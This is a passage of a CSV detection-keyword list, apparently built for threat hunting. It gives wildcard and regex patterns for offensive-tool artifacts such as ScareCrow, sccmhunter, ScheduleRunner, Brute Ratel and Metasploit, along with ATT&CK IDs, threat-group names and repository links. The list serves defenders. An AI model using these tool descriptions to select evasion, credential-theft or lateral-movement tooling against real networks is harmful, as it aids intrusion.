T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -Loader * ",".{0,1000}ScareCrow.{0,1000}\s\-Loader\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -noamsi*",".{0,1000}ScareCrow.{0,1000}\s\-noamsi.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -noetw*",".{0,1000}ScareCrow.{0,1000}\s\-noetw.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -obfu*",".{0,1000}ScareCrow.{0,1000}\s\-obfu.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow*_darwin_amd64*",".{0,1000}ScareCrow.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow*_windows_amd64.exe*",".{0,1000}ScareCrow.{0,1000}_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow*KnownDLL*",".{0,1000}ScareCrow.{0,1000}KnownDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow*ProcessInjection*",".{0,1000}ScareCrow.{0,1000}ProcessInjection.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow*windows_amd64.exe*",".{0,1000}ScareCrow.{0,1000}windows_amd64\.exe.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow.cna*",".{0,1000}ScareCrow\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","446","69","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" "*ScareCrow.go*",".{0,1000}ScareCrow\.go.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow/Cryptor*",".{0,1000}ScareCrow\/Cryptor.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow/limelighter*",".{0,1000}ScareCrow\/limelighter.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow/Loader*",".{0,1000}ScareCrow\/Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow/Utils*",".{0,1000}ScareCrow\/Utils.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow_*_darwin_amd64*",".{0,1000}ScareCrow_.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow_*_linux_amd64*",".{0,1000}ScareCrow_.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow_*amd64*",".{0,1000}ScareCrow_.{0,1000}amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow_checksums.txt*",".{0,1000}ScareCrow_checksums\.txt.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*SCCM_DLLSiteloading.txt*",".{0,1000}SCCM_DLLSiteloading\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*sccmdecryptpoc.*",".{0,1000}sccmdecryptpoc\..{0,1000}","offensive_tool_keyword","sccmdecryptpoc","SCCM Account Password Decryption POC","T1555.003","TA0006","N/A","N/A","Credential Access","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sccmhunter.db",".{0,1000}sccmhunter\.db","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*sccmhunter.git*",".{0,1000}sccmhunter\.git.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*sccmhunter.py*",".{0,1000}sccmhunter\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*sccmwtf.py*",".{0,1000}sccmwtf\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*scdivert localhost *",".{0,1000}scdivert\slocalhost\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*scecli\0evilpwfilter*",".{0,1000}scecli\\0evilpwfilter.{0,1000}","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn/OSCP-Archives","1","0","N/A","N/A","7","610","194","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z" "*scheduledtask_utils.py *",".{0,1000}scheduledtask_utils\.py\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*ScheduleRunner.csproj*",".{0,1000}ScheduleRunner\.csproj.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*ScheduleRunner.exe*",".{0,1000}ScheduleRunner\.exe.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*ScheduleRunner.sln*",".{0,1000}ScheduleRunner\.sln.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*schlamperei.x86.dll*",".{0,1000}schlamperei\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*schshell.cna*",".{0,1000}schshell\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 